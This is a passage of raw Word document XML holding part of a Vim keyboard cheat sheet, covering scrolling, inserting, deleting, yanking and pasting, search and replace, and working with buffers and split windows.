    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the screen to the middle of the window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zz</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="701"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the screen to the bottom of the window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="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AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BAF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Editing Text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insert mode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129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i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Insert before the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129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a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Insert after the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129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o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Open a new line below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129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O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Open a new line above</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129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x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Delete the character under the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129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dd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Delete the entire line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="129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 Delete from the cursor to the end of the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Undo/Redo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1296"/>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u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Undo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1296"/>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Ctrl + r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Redo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BB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BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Copy, Cut, and Paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy (yank):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="130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yy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Copy the entire line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="130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y$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Copy from the cursor to the end of the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cut (delete):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1301"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the same commands as delete (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dd</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 etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1301"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1301"/>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Paste after the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1301"/>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Paste before the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC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C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BC9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Search and Replace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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/word</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Search forward for "word"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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?word</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Search backward for "word"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Repeat search in the same direction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Repeat search in the opposite direction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="495"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="495"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:s/old/new/g</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Replace "old" with "new" in the current line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="495"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:%s/old/new/g</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Replace "old" with "new" in the entire file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD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D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Working with Multiple Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open another file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:e otherfile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch between files: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:bnext</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:bprev</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View splits:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Horizontal split: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:split filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vertical split: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:vsplit filename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003BDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate splits: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + w</w:t>
      </w:r>
